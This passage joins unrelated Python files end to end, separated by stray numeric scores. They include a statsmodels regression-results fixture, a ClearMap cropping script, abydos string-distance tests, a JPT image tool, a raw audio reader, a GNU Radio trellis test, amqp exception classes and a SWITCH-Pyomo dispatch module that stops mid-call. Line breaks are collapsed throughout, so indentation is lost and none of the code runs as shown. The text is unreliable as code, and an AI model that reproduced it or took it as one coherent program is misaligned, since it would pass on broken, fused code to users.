[aw=1/mvalue], cluster(company)", cmd = "ivreg2", wtype = "aweight", wexp = "=1/mvalue", model = "ols", depvar = "invest", vcetype = "Robust", vce = "robust cluster", partialsmall = "small", inexog = "mvalue kstock", insts = "mvalue kstock", properties = "b V", ) params_table = np.array([ .11694307068216, .02463240320082, 4.7475298990826, 2.059159576e-06, .06866444755588, .16522169380844, np.nan, 1.9599639845401, 0, .10410756769914, .02157653909108, 4.8250355286218, 1.399783125e-06, .06181832816961, .14639680722867, np.nan, 1.9599639845401, 0, -9.2723336171089, 5.3995775192484, -1.7172331694572, .08593657730569, -19.855311086568, 1.31064385235, np.nan, 1.9599639845401, 0]).reshape(3,9) params_table_colnames = 'b se z pvalue ll ul df crit eform'.split() params_table_rownames = 'mvalue kstock _cons'.split() cov = np.array([ .00060675528745, -.00005787711139, -.07953498994782, -.00005787711139, .00046554703915, -.06210991017966, -.07953498994782, -.06210991017966, 29.155437386372]).reshape(3,3) cov_colnames = 'mvalue kstock _cons'.split() cov_rownames = 'mvalue kstock _cons'.split() results_cluster_wls_large = Bunch( params_table=params_table, params_table_colnames=params_table_colnames, params_table_rownames=params_table_rownames, cov=cov, cov_colnames=cov_colnames, cov_rownames=cov_rownames, **est )
0.031511
# -*- coding: utf-8 -*- """ Created on Mon Jul 18 13:48:09 2016 @author: ckirst """ # test cropping import ClearMap.IO as io reload(io); import ClearMap.Settings as settings import ClearMap.Alignment.Stitching as st import os import numpy as np datadir ='/home/mtllab/Documents/th/'; fn = os.path.join(datadir, r'160412_mosaic_15-20-19/15-20-19_mosaic_UltraII\[(?P<row>\d{2}) x (?P<col>\d{2})\]_C00_xyz-Table Z(?P<z>\d{4}).ome.tif') _, gr = st.findFileList(fn , sort = True, groups = ['row','col'], absolute = True) groups = []; for i in range(gr.shape[1]): groups.append(np.unique(gr[:,i])); print groups for i in groups[0]: for j in groups[1]: fileExpression = os.path.join(datadir, r'160412_mosaic_15-20-19/15-20-19_mosaic_UltraII\[%s x %s]_C00_xyz-Table Z\d{4}.ome.tif' % (i,j)) io.dataSize(fileExpression) io.readMetaData(fileExpression, info = ['size', 'overlap', 'resolution']) import ClearMap.IO.FileList as fl; reload(fl) fncrop = os.path.join(datadir, r'cropped/15-20-19_mosaic_UltraII_%s_x_%s_C00_xyz-Table Z\d{4}.ome.tif' % (i,j)) fc = fl.cropData(fileExpression, fncrop, x = (400, -400), y = (550, -550), adjustOverlap = True, processes = all) #fc1 = fl.firstFile(fc) #io.readMetaData(fc1, info = ['overlap', 'resolution', 'size']);
0.031065
# Copyright 2019-2020 by Christopher C. Little. # This file is part of Abydos. # # Abydos is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Abydos is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Abydos. If not, see <http://www.gnu.org/licenses/>. """abydos.tests.distance.test_distance_cole. This module contains unit tests for abydos.distance.Cole """ import unittest from abydos.distance import Cole class ColeTestCases(unittest.TestCase): """Test Cole functions. abydos.distance.Cole """ cmp = Cole() cmp_no_d = Cole(alphabet=0) cmp_a16 = Cole(alphabet=16) def test_cole_sim(self): """Test abydos.distance.Cole.sim.""" # Base cases self.assertEqual(self.cmp.sim('', ''), 1.0) self.assertEqual(self.cmp.sim('a', ''), 0.5) self.assertEqual(self.cmp.sim('', 'a'), 0.5) self.assertEqual(self.cmp.sim('abc', ''), 0.5) self.assertEqual(self.cmp.sim('', 'abc'), 0.5) self.assertEqual(self.cmp.sim('abc', 'abc'), 1.0) self.assertEqual(self.cmp.sim('abcd', 'efgh'), 0.0) self.assertAlmostEqual(self.cmp.sim('Nigel', 'Niall'), 0.7480719794) self.assertAlmostEqual(self.cmp.sim('Niall', 'Nigel'), 0.7480719794) self.assertAlmostEqual(self.cmp.sim('Colin', 'Coiln'), 0.7480719794) self.assertAlmostEqual(self.cmp.sim('Coiln', 'Colin'), 0.7480719794) self.assertAlmostEqual( self.cmp.sim('ATCAACGAGT', 'AACGATTAG'), 0.8158327461 ) # Tests with alphabet=0 (no d factor) self.assertEqual(self.cmp_no_d.sim('', ''), 1.0) self.assertEqual(self.cmp_no_d.sim('a', ''), 0.5) self.assertEqual(self.cmp_no_d.sim('', 'a'), 0.5) self.assertEqual(self.cmp_no_d.sim('abc', ''), 0.5) self.assertEqual(self.cmp_no_d.sim('', 'abc'), 0.5) self.assertEqual(self.cmp_no_d.sim('abc', 'abc'), 1.0) self.assertEqual(self.cmp_no_d.sim('abcd', 'efgh'), 0.0) self.assertAlmostEqual(self.cmp_no_d.sim('Nigel', 'Niall'), 0.0) self.assertAlmostEqual(self.cmp_no_d.sim('Niall', 'Nigel'), 0.0) self.assertAlmostEqual(self.cmp_no_d.sim('Colin', 'Coiln'), 0.0) self.assertAlmostEqual(self.cmp_no_d.sim('Coiln', 'Colin'), 0.0) self.assertAlmostEqual( self.cmp_no_d.sim('ATCAACGAGT', 'AACGATTAG'), 0.0 ) # cases b & c self.assertAlmostEqual( self.cmp_a16.sim('ATCAACGAGT', 'AACGATTAG'), 0.5151515151515151 ) self.assertAlmostEqual( self.cmp_a16.sim('ATCAACGAGT', 'AACGAACGATTAGATTAG'), 0.2976190476190476, ) def test_cole_dist(self): """Test abydos.distance.Cole.dist.""" # Base cases self.assertEqual(self.cmp.dist('', ''), 0.0) self.assertEqual(self.cmp.dist('a', ''), 0.5) self.assertEqual(self.cmp.dist('', 'a'), 0.5) self.assertEqual(self.cmp.dist('abc', ''), 0.5) self.assertEqual(self.cmp.dist('', 'abc'), 0.5) self.assertEqual(self.cmp.dist('abc', 'abc'), 0.0) self.assertEqual(self.cmp.dist('abcd', 'efgh'), 1.0) self.assertAlmostEqual(self.cmp.dist('Nigel', 'Niall'), 0.2519280206) self.assertAlmostEqual(self.cmp.dist('Niall', 'Nigel'), 0.2519280206) self.assertAlmostEqual(self.cmp.dist('Colin', 'Coiln'), 0.2519280206) self.assertAlmostEqual(self.cmp.dist('Coiln', 'Colin'), 0.2519280206) self.assertAlmostEqual( self.cmp.dist('ATCAACGAGT', 'AACGATTAG'), 0.1841672539 ) # Tests with alphabet=0 (no d factor) self.assertEqual(self.cmp_no_d.dist('', ''), 0.0) self.assertEqual(self.cmp_no_d.dist('a', ''), 0.5) self.assertEqual(self.cmp_no_d.dist('', 'a'), 0.5) self.assertEqual(self.cmp_no_d.dist('abc', ''), 0.5) self.assertEqual(self.cmp_no_d.dist('', 'abc'), 0.5) self.assertEqual(self.cmp_no_d.dist('abc', 'abc'), 0.0) self.assertEqual(self.cmp_no_d.dist('abcd', 'efgh'), 1.0) self.assertAlmostEqual(self.cmp_no_d.dist('Nigel', 'Niall'), 1.0) self.assertAlmostEqual(self.cmp_no_d.dist('Niall', 'Nigel'), 1.0) self.assertAlmostEqual(self.cmp_no_d.dist('Colin', 'Coiln'), 1.0) self.assertAlmostEqual(self.cmp_no_d.dist('Coiln', 'Colin'), 1.0) self.assertAlmostEqual( self.cmp_no_d.dist('ATCAACGAGT', 'AACGATTAG'), 1.0 ) def test_cole_corr(self): """Test abydos.distance.Cole.corr.""" # Base cases self.assertEqual(self.cmp.corr('', ''), 1.0) self.assertEqual(self.cmp.corr('a', ''), 0.0) self.assertEqual(self.cmp.corr('', 'a'), 0.0) self.assertEqual(self.cmp.corr('abc', ''), 0.0) self.assertEqual(self.cmp.corr('', 'abc'), 0.0) self.assertEqual(self.cmp.corr('abc', 'abc'), 1.0) self.assertEqual(self.cmp.corr('abcd', 'efgh'), -1.0) self.assertAlmostEqual(self.cmp.corr('Nigel', 'Niall'), 0.4961439589) self.assertAlmostEqual(self.cmp.corr('Niall', 'Nigel'), 0.4961439589) self.assertAlmostEqual(self.cmp.corr('Colin', 'Coiln'), 0.4961439589) self.assertAlmostEqual(self.cmp.corr('Coiln', 'Colin'), 0.4961439589) self.assertAlmostEqual( self.cmp.corr('ATCAACGAGT', 'AACGATTAG'), 0.6316654921 ) # Tests with alphabet=0 (no d factor) self.assertEqual(self.cmp_no_d.corr('', ''), 1.0) self.assertEqual(self.cmp_no_d.corr('a', ''), 0.0) self.assertEqual(self.cmp_no_d.corr('', 'a'), 0.0) self.assertEqual(self.cmp_no_d.corr('abc', ''), 0.0) self.assertEqual(self.cmp_no_d.corr('', 'abc'), 0.0) self.assertEqual(self.cmp_no_d.corr('abc', 'abc'), 1.0) self.assertEqual(self.cmp_no_d.corr('abcd', 'efgh'), -1.0) self.assertAlmostEqual(self.cmp_no_d.corr('Nigel', 'Niall'), -1.0) self.assertAlmostEqual(self.cmp_no_d.corr('Niall', 'Nigel'), -1.0) self.assertAlmostEqual(self.cmp_no_d.corr('Colin', 'Coiln'), -1.0) self.assertAlmostEqual(self.cmp_no_d.corr('Coiln', 'Colin'), -1.0) self.assertAlmostEqual( self.cmp_no_d.corr('ATCAACGAGT', 'AACGATTAG'), -1.0 ) if __name__ == '__main__': unittest.main()
0
import os import struct import sys VERSION = "2.0" from jpt import Jpt def process(): print "-------------------------------------------------------------------------------" print "| April JPT Tool " + VERSION print "| JPT format version: " + str(Jpt.Version) print "-------------------------------------------------------------------------------" if len(sys.argv) < 2: info() elif sys.argv[1].lower() in ("help", "-h", "/h", "-?", "/?"): help() elif sys.argv[1].lower() == "merge": if len(sys.argv) != 5: info() return merge(sys.argv[2:len(sys.argv)]) elif sys.argv[1].lower() == "split": if len(sys.argv) != 5: info() return split(sys.argv[2:len(sys.argv)]) elif sys.argv[1].lower() == "prepare": if checkPIL(): if len(sys.argv) != 5 and len(sys.argv) != 6: info() return prepare(sys.argv[2:len(sys.argv)]) elif sys.argv[1].lower() == "convert": if checkPIL(): if len(sys.argv) != 4 and len(sys.argv) != 5: info() return convert(sys.argv[2:len(sys.argv)]) else: info() def merge(args): print Jpt.merge(args[0], args[1], args[2]) def split(args): print Jpt.split(args[0], args[1], args[2]) def prepare(args): if checkPIL(): quality = 95 if len(args) == 4: quality = int(args[3]) from pilconv import PilConv print PilConv.convert(args[0], args[1], args[2], quality) def convert(args): if checkPIL(): image = args.pop(1) jpeg = image + "__tmp__.jpg" png = image + "__tmp__.png" args.insert(1, jpeg) args.insert(2, png) prepare(args) merge([image, jpeg, png]) os.remove(jpeg) os.remove(png) def checkPIL(): try: import Image except: print "ERROR! Please install PIL to use the 'convert' command." print "http://www.pythonware.com/products/pil" return False return True def info(): print "" print "usage: jpt-tool.py merge JPT_FILENAME JPEG_FILENAME PNG_FILNAME" print " jpt-tool.py split JPT_FILENAME JPEG_FILENAME PNG_FILNAME" print " jpt-tool.py prepare FILENAME JPEG_FILENAME PNG_FILNAME [JPEG_QUALITY]" print " jpt-tool.py convert FILENAME JPT_FILENAME [JPEG_QUALITY]" print " use 'jpt-tool.py -h' for more information" print "" if os.name != 'posix': os.system("pause") def help(): print "" print "usage: jpt-tool.py merge JPT_FILENAME JPEG_FILENAME PNG_FILNAME" print " jpt-tool.py split JPT_FILENAME JPEG_FILENAME PNG_FILNAME" print " jpt-tool.py prepare FILENAME JPEG_FILENAME PNG_FILNAME [JPEG_QUALITY]" print " jpt-tool.py convert FILENAME JPT_FILENAME [JPEG_QUALITY]" print "" print "commands:" print "merge - merges a JPEG and a PNG file into a JPT file" print "split - splits a JPT file to a JPEG and a PNG file" print "prepare - creates PNG and JPEG images from an image file (requires PIL installed)" print "convert - creates a JPT image from an image file direclty using 'prepare' (requires PIL installed)" print "" print "JPT_FILENAME - JPT filename to use in the process" print "JPEG_FILENAME - JPEG filename to use in the process" print "PNG_FILENAME - PNG filename to use in the process" print "FILENAME - image filename (any format) to use in the process" print "JPEG_QUALITY - value from 1 (worst) to 95 (best) for JPEG compression quality (default = 95); values above 95 should be avoided, 100 completely disables the quantization stage" print "" os.system("pause") process()
0.029989
#!/usr/bin/env python # vim: sw=4:ts=4:sts=4:fdm=indent:fdl=0: # -*- coding: UTF8 -*- # # A module to handle the reading of raw files. # Copyright (C) 2012 Josiah Gordon <josiahg@gmail.com> # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. """ A module for reading raws. """ from os.path import getsize as os_getsize from .io_base import AudioIO, io_wrapper __supported_dict = { 'ext': ['.raw'], 'handler': 'RawFile' } class RawFile(AudioIO): """ A file like object for reading raws. """ # Both reading and writing are supported _supported_modes = 'rw' def __init__(self, filename, mode='r', depth=16, rate=44100, channels=2, **kwargs): """ RawFile(filename, mode='r', depth=16, rate=44100, channels=2) -> Initialize the playback settings of the player. """ super(RawFile, self).__init__(filename, mode, depth, rate, channels) if 'r' in mode: self._length = os_getsize(filename) self._file = self._open(filename) self.seek = self._file.seek self.tell = self._file.tell self.write = self._file.write def _set_position(self, position): """ Change the position of playback. """ self._file.seek(position) def _get_position(self): """ Updates the position variable. """ return self._file.tell() def _open(self, filename): """ _open(filename) -> Load the specified file. """ self._closed = False return open(filename, '%sb' % self._mode, buffering=0) @io_wrapper def write(self, data: bytes) -> int: """ write(data) -> Write data to raw audio file. """ return self._file.write(data) @io_wrapper def read(self, size: int) -> bytes: """ read(size=None) -> Reads size amount of data and returns it. If size is None then read a buffer size. """ if self.position >= self._length: if self._loops == -1 or self._loop_count < self._loops: self._loop_count += 1 self.seek(0) return self._file.read(size) def close(self): """ close -> Closes and cleans up. """ if not self.closed: self._file.close() self._closed = True
0
#!/usr/bin/env python from gnuradio import gr from gnuradio import audio from gnuradio import trellis, digital, blocks from gnuradio import eng_notation import math import sys import random import fsm_utils try: from gnuradio import analog except ImportError: sys.stderr.write("Error: Program requires gr-analog.\n") sys.exit(1) def run_test (f,Kb,bitspersymbol,K,dimensionality,constellation,N0,seed): tb = gr.top_block () # TX src = blocks.lfsr_32k_source_s() src_head = blocks.head (gr.sizeof_short,Kb/16) # packet size in shorts s2fsmi = blocks.packed_to_unpacked_ss(bitspersymbol,gr.GR_MSB_FIRST) # unpack shorts to symbols compatible with the FSM input cardinality enc = trellis.encoder_ss(f,0) # initial state = 0 mod = digital.chunks_to_symbols_sf(constellation,dimensionality) # CHANNEL add = blocks.add_ff() noise = analog.noise_source_f(analog.GR_GAUSSIAN,math.sqrt(N0/2),seed) # RX metrics = trellis.metrics_f(f.O(),dimensionality,constellation,digital.TRELLIS_EUCLIDEAN) # data preprocessing to generate metrics for Viterbi va = trellis.viterbi_s(f,K,0,-1) # Put -1 if the Initial/Final states are not set. fsmi2s = blocks.unpacked_to_packed_ss(bitspersymbol,gr.GR_MSB_FIRST) # pack FSM input symbols to shorts dst = blocks.check_lfsr_32k_s(); tb.connect (src,src_head,s2fsmi,enc,mod) tb.connect (mod,(add,0)) tb.connect (noise,(add,1)) tb.connect (add,metrics) tb.connect (metrics,va,fsmi2s,dst) tb.run() # A bit of cheating: run the program once and print the # final encoder state. # Then put it as the last argument in the viterbi block #print "final state = " , enc.ST() ntotal = dst.ntotal () nright = dst.nright () runlength = dst.runlength () return (ntotal,ntotal-nright) def main(args): nargs = len (args) if nargs == 3: fname=args[0] esn0_db=float(args[1]) # Es/No in dB rep=int(args[2]) # number of times the experiment is run to collect enough errors else: sys.stderr.write ('usage: test_tcm.py fsm_fname Es/No_db repetitions\n') sys.exit (1) # system parameters f=trellis.fsm(fname) # get the FSM specification from a file Kb=1024*16 # packet size in bits (make it multiple of 16 so it can be packed in a short) bitspersymbol = int(round(math.log(f.I())/math.log(2))) # bits per FSM input symbol K=Kb/bitspersymbol # packet size in trellis steps modulation = fsm_utils.psk4 # see fsm_utlis.py for available predefined modulations dimensionality = modulation[0] constellation = modulation[1] if len(constellation)/dimensionality != f.O(): sys.stderr.write ('Incompatible FSM output cardinality and modulation size.\n') sys.exit (1) # calculate average symbol energy Es = 0 for i in range(len(constellation)): Es = Es + constellation[i]**2 Es = Es / (len(constellation)/dimensionality) N0=Es/pow(10.0,esn0_db/10.0); # noise variance tot_s=0 terr_s=0 for i in range(rep): (s,e)=run_test(f,Kb,bitspersymbol,K,dimensionality,constellation,N0,-long(666+i)) # run experiment with different seed to get different noise realizations tot_s=tot_s+s terr_s=terr_s+e if (i%100==0): print i,s,e,tot_s,terr_s, '%e' % ((1.0*terr_s)/tot_s) # estimate of the (short) error rate print tot_s,terr_s, '%e' % ((1.0*terr_s)/tot_s) if __name__ == '__main__': main (sys.argv[1:])
0.030329
"""Exceptions used by amqp""" # Copyright (C) 2007-2008 Barry Pederson <bp@barryp.org> # # This library is free software; you can redistribute it and/or # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. # # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 from __future__ import absolute_import from struct import pack, unpack __all__ = [ 'AMQPError', 'ConnectionError', 'ChannelError', 'RecoverableConnectionError', 'IrrecoverableConnectionError', 'RecoverableChannelError', 'IrrecoverableChannelError', 'ConsumerCancelled', 'ContentTooLarge', 'NoConsumers', 'ConnectionForced', 'InvalidPath', 'AccessRefused', 'NotFound', 'ResourceLocked', 'PreconditionFailed', 'FrameError', 'FrameSyntaxError', 'InvalidCommand', 'ChannelNotOpen', 'UnexpectedFrame', 'ResourceError', 'NotConfirmed', 'NotAllowed', 'AMQPNotImplementedError', 'InternalError', ] class AMQPError(Exception): code = 0 def __init__(self, reply_text=None, method_sig=None, method_name=None, reply_code=None): self.message = reply_text self.reply_code = reply_code or self.code self.reply_text = reply_text self.method_sig = method_sig self.method_name = method_name or '' if method_sig and not self.method_name: self.method_name = METHOD_NAME_MAP.get(method_sig, '') Exception.__init__(self, reply_code, reply_text, method_sig, self.method_name) def __str__(self): if self.method: return '{0.method}: ({0.reply_code}) {0.reply_text}'.format(self) return self.reply_text or '<AMQPError: unknown error>' @property def method(self): return self.method_name or self.method_sig class ConnectionError(AMQPError): pass class ChannelError(AMQPError): pass class RecoverableChannelError(ChannelError): pass class IrrecoverableChannelError(ChannelError): pass class RecoverableConnectionError(ConnectionError): pass class IrrecoverableConnectionError(ConnectionError): pass class Blocked(RecoverableConnectionError): pass class ConsumerCancelled(RecoverableConnectionError): pass class ContentTooLarge(RecoverableChannelError): code = 311 class NoConsumers(RecoverableChannelError): code = 313 class ConnectionForced(RecoverableConnectionError): code = 320 class InvalidPath(IrrecoverableConnectionError): code = 402 class AccessRefused(IrrecoverableChannelError): code = 403 class NotFound(IrrecoverableChannelError): code = 404 class NotConfirmed(RecoverableConnectionError): pass class ResourceLocked(RecoverableChannelError): code = 405 class PreconditionFailed(IrrecoverableChannelError): code = 406 class FrameError(IrrecoverableConnectionError): code = 501 class FrameSyntaxError(IrrecoverableConnectionError): code = 502 class InvalidCommand(IrrecoverableConnectionError): code = 503 class ChannelNotOpen(IrrecoverableConnectionError): code = 504 class UnexpectedFrame(IrrecoverableConnectionError): code = 505 class ResourceError(RecoverableConnectionError): code = 506 class NotAllowed(IrrecoverableConnectionError): code = 530 class AMQPNotImplementedError(IrrecoverableConnectionError): code = 540 class InternalError(IrrecoverableConnectionError): code = 541 ERROR_MAP = { 311: ContentTooLarge, 313: NoConsumers, 320: ConnectionForced, 402: InvalidPath, 403: AccessRefused, 404: NotFound, 405: ResourceLocked, 406: PreconditionFailed, 501: FrameError, 502: FrameSyntaxError, 503: InvalidCommand, 504: ChannelNotOpen, 505: UnexpectedFrame, 506: ResourceError, 530: NotAllowed, 540: AMQPNotImplementedError, 541: InternalError, } def error_for_code(code, text, method, default): try: return ERROR_MAP[code](text, method, reply_code=code) except KeyError: return default(text, method, reply_code=code) def raise_for_code(code, text, method, default): raise error_for_code(code, text, method, default) METHOD_NAME_MAP = { (10, 10): 'Connection.start', (10, 11): 'Connection.start_ok', (10, 20): 'Connection.secure', (10, 21): 'Connection.secure_ok', (10, 30): 'Connection.tune', (10, 31): 'Connection.tune_ok', (10, 40): 'Connection.open', (10, 41): 'Connection.open_ok', (10, 50): 'Connection.close', (10, 51): 'Connection.close_ok', (20, 10): 'Channel.open', (20, 11): 'Channel.open_ok', (20, 20): 'Channel.flow', (20, 21): 'Channel.flow_ok', (20, 40): 'Channel.close', (20, 41): 'Channel.close_ok', (30, 10): 'Access.request', (30, 11): 'Access.request_ok', (40, 10): 'Exchange.declare', (40, 11): 'Exchange.declare_ok', (40, 20): 'Exchange.delete', (40, 21): 'Exchange.delete_ok', (40, 30): 'Exchange.bind', (40, 31): 'Exchange.bind_ok', (40, 40): 'Exchange.unbind', (40, 41): 'Exchange.unbind_ok', (50, 10): 'Queue.declare', (50, 11): 'Queue.declare_ok', (50, 20): 'Queue.bind', (50, 21): 'Queue.bind_ok', (50, 30): 'Queue.purge', (50, 31): 'Queue.purge_ok', (50, 40): 'Queue.delete', (50, 41): 'Queue.delete_ok', (50, 50): 'Queue.unbind', (50, 51): 'Queue.unbind_ok', (60, 10): 'Basic.qos', (60, 11): 'Basic.qos_ok', (60, 20): 'Basic.consume', (60, 21): 'Basic.consume_ok', (60, 30): 'Basic.cancel', (60, 31): 'Basic.cancel_ok', (60, 40): 'Basic.publish', (60, 50): 'Basic.return', (60, 60): 'Basic.deliver', (60, 70): 'Basic.get', (60, 71): 'Basic.get_ok', (60, 72): 'Basic.get_empty', (60, 80): 'Basic.ack', (60, 90): 'Basic.reject', (60, 100): 'Basic.recover_async', (60, 110): 'Basic.recover', (60, 111): 'Basic.recover_ok', (60, 120): 'Basic.nack', (90, 10): 'Tx.select', (90, 11): 'Tx.select_ok', (90, 20): 'Tx.commit', (90, 21): 'Tx.commit_ok', (90, 30): 'Tx.rollback', (90, 31): 'Tx.rollback_ok', (85, 10): 'Confirm.select', (85, 11): 'Confirm.select_ok', } for _method_id, _method_name in list(METHOD_NAME_MAP.items()): METHOD_NAME_MAP[unpack('>I', pack('>HH', *_method_id))[0]] = _method_name
0
# Copyright 2015 The Switch Authors. All rights reserved. # Licensed under the Apache License, Version 2, which is in the LICENSE file. """ Defines model components to describe generation projects build-outs for the SWITCH-Pyomo model. This module requires either project.unitcommit or project.no_commit to constrain project dispatch to either committed or installed capacity. SYNOPSIS >>> from switch_mod.utilities import define_AbstractModel >>> model = define_AbstractModel( ... 'timescales', 'financials', 'load_zones', 'fuels', ... 'gen_tech', 'project.build', 'project.dispatch') >>> instance = model.load_inputs(inputs_dir='test_dat') """ import os from pyomo.environ import * def define_components(mod): """ Adds components to a Pyomo abstract model object to describe the dispatch decisions and constraints of generation and storage projects. Unless otherwise stated, all power capacity is specified in units of MW and all sets and parameters are mandatory. PROJ_DISPATCH_POINTS is a set of projects and timepoints in which they can be dispatched. A dispatch decisions is made for each member of this set. Members of this set can be abbreviated as (proj, t) or (prj, t). ProjCapacityTP[(proj, t) in PROJ_DISPATCH_POINTS] is the same as ProjCapacity but indexed by timepoint rather than period to allow more compact statements. DispatchProj[(proj, t) in PROJ_DISPATCH_POINTS] is the set of generation dispatch decisions: how much average power in MW to produce in each timepoint. This value can be multiplied by the duration of the timepoint in hours to determine the energy produced by a project in a timepoint. This will need to have another index of energy_source to fully support generators that use multiple fuels. proj_availability[prj] describes the fraction of a time a project is expected to be available. This is derived from the forced and scheduled outage rates of generation technologies. For baseload or flexible baseload, this is determined from both forced and scheduled outage rates. For all other types of generation technologies, we assume the scheduled outages can be performed when the generators were not scheduled to produce power, so their availability is only derated based on their forced outage rates. prj_max_capacity_factor[prj, t] is defined for variable renewable projects and is the ratio of average power output to nameplate capacity in that timepoint. Most renewable capacity factors should be in the range of 0 to 1. Some solar capacity factors will be above 1 because the nameplate capacity is based on solar radiation of 1.0 kW/m^2 and solar radiation can exceed that value on very clear days or on partially cloudy days when light bounces off the bottom of clouds onto a solar panel. Some solar thermal capacity factors can be less than 0 because of auxillary loads: for example, parts of those plants need to be kept warm during winter nights to avoid freezing. Those heating loads can be significant during certain timepoints. proj_variable_om[proj] is the variable Operations and Maintenance costs (O&M) per MWh of dispatched capacity for a given project. Proj_Var_Costs_Hourly[t in TIMEPOINTS] is the sum of all variable costs associated with project dispatch for each timepoint expressed in $base_year/hour in the future period (rather than Net Present Value). PROJ_FUEL_DISPATCH_POINTS is a subset of PROJ_DISPATCH_POINTS for projects that consume fuel and could produce emissions. ProjFuelUseRate[(proj, t) in PROJ_FUEL_DISPATCH_POINTS] is a variable that describes fuel consumption rate in MMBTU/h. This should be constrained to the fuel consumed by a project in each timepoint and can be calculated as Dispatch [MW] * effective_heat_rate [MMBTU/MWh] -> [MMBTU/h]. The choice of how to constrain it depends on the treatment of unit commitment. Currently the project.no_commit module implements a simple treatment that ignores unit commitment and assumes a full load heat rate, while the project.unitcommit module implements unit commitment decisions with startup fuel requirements and a marginal heat rate. DispatchEmissions[(proj, t) in PROJ_FUEL_DISPATCH_POINTS] is the emissions produced by dispatching a fuel-based project in units of metric tonnes CO2 per hour. This is derived from the fuel consumption ProjFuelUseRate, the fuel's direct carbon intensity, the fuel's upstream emissions, as well as Carbon Capture efficiency for generators that implement Carbon Capture and Sequestration. This does not yet support multi-fuel generators. --- Delayed implementation, possibly relegated to other modules. --- Flexible baseload support for plants that can ramp slowly over the course of days. These kinds of generators can provide important seasonal support in high renewable and low emission futures. Parasitic loads that make solar thermal plants consume energy from the grid on cold nights to keep their fluids from getting too cold. Storage support. Hybrid project support (pumped hydro & CAES) will eventually get implemented in separate modules. """ # I might be able to simplify this, but the current formulation # should exclude any timepoints in periods in which a project will # definitely be retired. def init_dispatch_timepoints(m): dispatch_timepoints = set() for (proj, bld_yr) in m.PROJECT_BUILDYEARS: for period in m.PROJECT_BUILDS_OPERATIONAL_PERIODS[proj, bld_yr]: for t in m.TIMEPOINTS: if(m.tp_period[t] == period): dispatch_timepoints.add((proj, t)) return dispatch_timepoints mod.PROJ_DISPATCH_POINTS = Set( dimen=2, initialize=init_dispatch_timepoints) mod.ProjCapacityTP = Expression( mod.PROJ_DISPATCH_POINTS, initialize=lambda m, proj, t: m.ProjCapacity[proj, m.tp_period[t]]) mod.DispatchProj = Var( mod.PROJ_DISPATCH_POINTS, within=NonNegativeReals) mod.LZ_NetDispatch = Expression( mod.LOAD_ZONES, mod.TIMEPOINTS, initialize=lambda m, lz, t: sum( m.DispatchProj[p, t] for p in m.LZ_PROJECTS[lz] if (p, t) in m.PROJ_DISPATCH_POINTS)) # Register net dispatch as contributing to a load zone's energy mod.LZ_Energy_Balance_components.append('LZ_NetDispatch') def init_proj_availability(model, project): tech = model.proj_gen_tech[project] if(model.g_is_baseload[tech] or model.g_is_flexible_baseload[tech]): return (1 - model.g_forced_outage_rate[tech]) * ( 1 - model.g_scheduled_outage_rate[tech]) else: return (1 - model.g_forced_outage_rate[tech]) mod.proj_availability = Param( mod.PROJECTS, within=PositiveReals, initialize=init_proj_availability) mod.VAR_DISPATCH_POINTS = Set( initialize=mod.PROJ_DISPATCH_POINTS, filter=lambda m, proj, t: proj in m.VARIABLE_PROJECTS) mod.prj_max_capacity_factor = Param( mod.VAR_DISPATCH_POINTS, within=Reals, validate=lambda m, val, proj, t: -1 < val < 2) mod.min_data_check('prj_max_capacity_factor') mod.proj_variable_om = Param( mod.PROJECTS, within=NonNegativeReals, default=lambda m, proj: ( m.g_variable_o_m[m.proj_gen_tech[proj]] * m.lz_cost_multipliers[m.proj_load_zone[proj]])) mod.PROJ_FUEL_DISPATCH_POINTS = Set( initialize=mod.PROJ_DISPATCH_POINTS, filter=lambda m, proj, t: proj in m.FUEL_BASED_PROJECTS) mod.ProjFuelUseRate = Var( mod.PROJ_FUEL_DISPATCH_POINTS, within=NonNegativeReals) def DispatchEmissions_rule(m, proj, t): g = m.proj_gen_tech[proj] f = m.proj_fuel[proj] if g not in m.CCS_TECHNOLOGIES: return ( m.ProjFuelUseRate[proj, t] * (m.f_co2_intensity[f] - m.f_upstream_co2_intensity[f])) else: ccs_emission_frac = 1 - m.g_ccs_capture_efficiency[g] return ( m.ProjFuelUseRate[proj, t] * (m.f_co2_intensity[f] * ccs_emission_frac - m.f_upstream_co2_intensity[f])) mod.DispatchEmissions = Expression( mod.PROJ_FUEL_DISPATCH_POINTS, initialize=DispatchEmissions_rule) mod.Proj_Var_Costs_Hourly = Expression( mod.PROJ_DISPATCH_POINTS, initialize=lambda m, proj, t: ( m.DispatchProj[proj, t] * m.proj_variable_om[proj])) # An expression to summarize costs for the objective function. Units # should be total future costs in $base_year real dollars. The # objective function will convert these to base_year Net Present # Value in $base_year real dollars. mod.Total_Proj_Var_Costs_Hourly = Expression( mod.TIMEPOINTS, initialize=lambda m, t: sum( m.Proj_Var_Costs_Hourly[proj, t] for (proj, t2) in m.PROJ_DISPATCH_POINTS if t == t2)) mod.cost_components_tp.append('Total_Proj_Var_Costs_Hourly') def load_inputs(mod, switch_data, inputs_dir): """ Import project-specific data from an input directory. Both files are optional. variable_capacity_factors can be skipped if no variable renewable projects are considered in the optimization. variable_capacity_factors.tab PROJECT, timepoint, prj_capacity_factor proj_variable_costs optional and overrides generic costs for generators. Load-zone cost adjustments will not be applied to any costs specified in this file. proj_variable_costs.tab PROJECT, proj_variable_om """ switch_data.load_aug( optional=True, filename=os.path.join(inputs_dir, 'variable_capacity_factors.tab'), 